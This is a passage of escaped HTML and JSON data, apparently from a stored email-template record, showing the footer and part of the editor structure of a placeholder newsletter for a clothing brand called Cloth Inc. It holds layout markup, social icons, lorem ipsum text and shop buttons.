\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:30px 10px 0px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #a5726e; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 14px; line-height: 19.6px;\\\"><strong><span style=\\\"line-height: 19.6px; font-size: 14px;\\\">F O L L O W&nbsp; &nbsp;A L O N G&nbsp; &nbsp;W I T H&nbsp; &nbsp;U S<\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"28%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 2px solid #ca979a;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<div align=\\\"center\\\">\\r\\n  <div style=\\\"display: table; max-width:183px;\\\">\\r\\n  <!--[if (mso)|(IE)]><table width=\\\"183\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"border-collapse:collapse;\\\" align=\\\"center\\\"><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"border-collapse:collapse; mso-table-lspace: 0pt;mso-table-rspace: 0pt; width:183px;\\\"><tr><![endif]-->\\r\\n  \\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 14px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 14px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/pinterest.com\\/\\\" title=\\\"Pinterest\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/rounded\\/pinterest.png\\\" alt=\\\"Pinterest\\\" title=\\\"Pinterest\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 14px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 14px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/youtube.com\\/\\\" title=\\\"YouTube\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/rounded\\/youtube.png\\\" alt=\\\"YouTube\\\" title=\\\"YouTube\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 14px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 14px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/instagram.com\\/\\\" title=\\\"Instagram\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/rounded\\/instagram.png\\\" alt=\\\"Instagram\\\" title=\\\"Instagram\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 0px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/soundcloud.com\\/\\\" title=\\\"SoundCloud\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/rounded\\/soundcloud.png\\\" alt=\\\"SoundCloud\\\" title=\\\"SoundCloud\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    \\r\\n    <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 20px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"line-height: 150%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 150%;\\\">212 26th St &nbsp;| &nbsp;Santa Monica &nbsp;| &nbsp;CA &nbsp;| &nbsp;90402 <\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 150%;\\\">Cloth Inc. &nbsp;All rights reserved.&nbsp;<\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 150%;\\\">Company No. 123456789<br \\/>Manage Preferences | Unsubscribe &nbsp;| View in browser&nbsp;<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #a47e6b;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #a47e6b;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #ffffff; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\">Too many emails?&nbsp; <span style=\\\"text-decoration: underline; font-size: 14px; line-height: 19.6px;\\\">Unsubscribe<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n    <!--[if (mso)|(IE)]><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n  <\\/tbody>\\r\\n  <\\/table>\\r\\n  <!--[if mso]><\\/div><![endif]-->\\r\\n  <!--[if IE]><\\/div><![endif]-->\\r\\n<\\/body>\\r\\n\\r\\n<\\/html>\\r\\n\"', '\"{\\\"counters\\\":{\\\"u_row\\\":8,\\\"u_column\\\":9,\\\"u_content_text\\\":11,\\\"u_content_image\\\":2,\\\"u_content_button\\\":5,\\\"u_content_social\\\":1,\\\"u_content_divider\\\":4},\\\"body\\\":{\\\"id\\\":\\\"0u7zmWfe6N\\\",\\\"rows\\\":[{\\\"id\\\":\\\"mzyaBaFj3Q\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"U5J6RuT_G3\\\",\\\"contents\\\":[{\\\"id\\\":\\\"PU1AcFTaVA\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"15px 10px 5px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1612261701794-solidarity1.png\\\",\\\"width\\\":64,\\\"height\\\":64},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_1\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"IujIkibZVI\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 10px 15px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_1\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong><span style=\\\\\\\"font-size: 16px; line-height: 22.4px;\\\\\\\">LOGO<\\/span><\\/strong><\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_1\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"#a47e6b\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":false},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_1\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"R4HsSwPE9M\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"NbC6bNPx-L\\\",\\\"contents\\\":[{\\\"id\\\":\\\"hwB_5FeW6h\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1612261885054-V.jpg\\\",\\\"width\\\":626,\\\"height\\\":626},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_2\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_2\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}},{\\\"id\\\":\\\"jzF8GQBO8Z\\\",\\\"contents\\\":[{\\\"id\\\":\\\"j27y9vBFGq\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"30px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#a87f6b\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_2\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 44px; line-height: 61.6px; font-family: \'comic sans ms\', sans-serif;\\\\\\\">Huge Range<\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 44px; line-height: 61.6px; font-family: \'comic sans ms\', sans-serif;\\\\\\\">of Trendy<\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 44px; line-height: 61.6px; font-family: \'comic sans ms\', sans-serif;\\\\\\\">Clothing<\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"qcrWUjk0SX\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"15px 10px 25px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#a87f6b\\\",\\\"backgroundColor\\\":\\\"#ffffff\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{\\\"borderTopColor\\\":\\\"#CCC\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderLeftColor\\\":\\\"#CCC\\\",\\\"borderLeftStyle\\\":\\\"solid\\\",\\\"borderLeftWidth\\\":\\\"1px\\\",\\\"borderRightColor\\\":\\\"#CCC\\\",\\\"borderRightStyle\\\":\\\"solid\\\",\\\"borderRightWidth\\\":\\\"1px\\\",\\\"borderBottomColor\\\":\\\"#CCC\\\",\\\"borderBottomStyle\\\":\\\"solid\\\",\\\"borderBottomWidth\\\":\\\"1px\\\"},\\\"borderRadius\\\":\\\"1px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_5\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<strong><span style=\\\\\\\"font-size: 14px; line-height: 16.8px;\\\\\\\">S H O P&nbsp; &nbsp;N O W<\\/span><\\/strong>\\\",\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":144,\\\"calculatedHeight\\\":36}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_3\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"#ffffff\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#ebd4ca\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":false},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_2\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"wnM4rRZ1up\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"WlezPt2_J3\\\",\\\"contents\\\":[{\\\"id\\\":\\\"EMkB6Vrllj\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"25px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#a47e6b\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_3\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong><span style=\\\\\\\"font-size: 32px; line-height: 44.8px; font-family: \'Playfair Display\', serif;\\\\\\\">\\\\\\\" Keeping it <\\/span><span style=\\\\\\\"font-family: \'Playfair Display\', serif; font-size: 32px; line-height: 44.8px;\\\\\\\">simple \\\\\\\"<\\/span><\\/strong><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"VbL1kpvFRg\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#292828\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_4\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\">Lorem ipsum dolor sit amet, consectetur adipiscing elit,<\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\">sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"n7WfELuq5h\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"15px 10px 25px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#a87f6b\\\",\\\"backgroundColor\\\":\\\"#ffffff\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{\\\"borderTopColor\\\":\\\"#CCC\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderLeftColor\\\":\\\"#CCC\\\",\\\"borderLeftStyle\\\":\\\"solid\\\",\\\"borderLeftWidth\\\":\\\"1px\\\",\\\"borderRightColor\\\":\\\"#CCC\\\",\\\"borderRightStyle\\\":\\\"solid\\\",\\\"borderRightWidth\\\":\\\"1px\\\",\\\"borderBottomColor\\\":\\\"#CCC\\\",\\\"borderBottomStyle\\\":\\\"solid\\\",\\\"borderBottomWidth\\\":\\\"1px\\\"},\\\"borderRadius\\\":\\\"1px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_3\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<strong><span style=\\\\\\\"font-size: 14px; line-height: 16.8px;\\\\\\\">R E A D&nbsp; M O R 